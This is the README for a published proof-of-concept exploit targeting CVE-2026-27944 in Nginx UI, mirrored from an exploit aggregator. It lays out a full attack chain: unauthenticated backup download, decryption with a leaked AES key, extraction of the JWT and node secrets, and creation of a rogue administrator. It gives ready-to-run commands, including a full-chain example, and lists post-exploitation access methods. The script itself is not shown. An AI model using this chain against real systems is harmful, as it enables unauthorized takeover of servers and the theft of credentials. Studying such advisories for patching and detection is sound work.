Share
## https://sploitus.com/exploit?id=CE708C35-6817-542A-A5AF-BC479EFC9928
# CVE-2026-27944 POC: Nginx UI Unauthenticated Backup Download + Dashboard Access

This repository contains an enhanced Proof of Concept (POC) exploit for **CVE-2026-27944**, a critical vulnerability in **Nginx UI**. 

The vulnerability allows an unauthenticated attacker to download system backups via the `/api/backup` endpoint. Furthermore, the application leaks the AES-256 encryption key and IV inside the `X-Backup-Security` HTTP response header, allowing the attacker to easily decrypt the downloaded backup. 

This enhanced POC automates the entire attack chain: downloading the backup, decrypting its contents, extracting configuration secrets (such as the `Node Secret` and `JWT Secret`), and leveraging those secrets to bypass authentication and create a rogue administrator account for full dashboard takeover.

### exploit successfully



### โš ๏ธ Disclaimer
**This tool is for educational purposes and authorized penetration testing only.** Do not use this tool against systems you do not own or do not have explicit permission to test. The author is not responsible for any misuse or damage caused by this script.

## Features

- **Unauthenticated Backup Download:** Retrieves the encrypted backup archive.
- **Key Extraction & Decryption:** Parses the `X-Backup-Security` header to extract the Base64-encoded AES key and IV, and decrypts the backup (`AES-256-CBC`).
- **Secret Extraction:** Automatically parses the decrypted `app.ini` to extract sensitive information:
  - JWT Secret
  - Node Secret
  - Crypto Secret
- **Authentication Bypass / Admin Creation:** Uses the extracted Node Secret (`X-Node-Secret` header) to interact with the API and create a new administrator user.
- **Token Retrieval:** Logs in with the newly created credentials to obtain a valid JWT token for immediate dashboard or API access.

## Prerequisites

- Python 3.x
- `pycryptodome` library (required for AES decryption)

## Installation

1. Clone the repository:
   ```bash
   git clone https://github.com/Skynoxk/CVE-2026-27944-POC.git
   cd CVE-2026-27944-POC
   ```

2. Install the required dependencies:
   ```bash
   pip install pycryptodome
   ```

## Usage

```bash
python exploit_enhanced.py --target  [OPTIONS]
```

### Arguments

| Argument | Description | Default |
| :--- | :--- | :--- |
| `--target` | **(Required)** Base URL of the Nginx UI instance (e.g., `http://127.0.0.1:9000`) | |
| `--out` | File path to save the encrypted backup | `backup.bin` |
| `--decrypt` | Decrypt the downloaded backup | `False` |
| `--extract-dir` | Directory to extract the decrypted files | `backup_extracted` |
| `--show-secrets`| Extract and display sensitive secrets from `app.ini` | `False` |
| `--create-user` | Create an admin user for dashboard access (specify username) | |
| `--password` | Password for the newly created admin user | `Admin@123456` |

### Examples

**1. Download and decrypt the backup only:**
```bash
python exploit_enhanced.py --target http://127.0.0.1:9000 --out backup.bin --decrypt
```

**2. Download, decrypt, and extract configuration secrets:**
```bash
python exploit_enhanced.py --target http://127.0.0.1:9000 --decrypt --show-secrets
```

**3. Full Exploit Chain (Download, Decrypt, Extract Secrets, and Create Admin):**
```bash
python exploit_enhanced.py --target http://127.0.0.1:9000 --decrypt --create-user hacker --password Pwned@123!
```

## Post-Exploitation Access

If the `--create-user` flag is utilized successfully, the script will output detailed methods for accessing the Nginx UI dashboard, including:
1. **Direct Web Login:** Standard browser login using the created credentials.
2. **Browser Console Injection:** Setting the `authorization` cookie using the retrieved JWT token.
3. **Direct API Access:** `curl` commands using the `X-Node-Secret` header to bypass authentication mechanisms.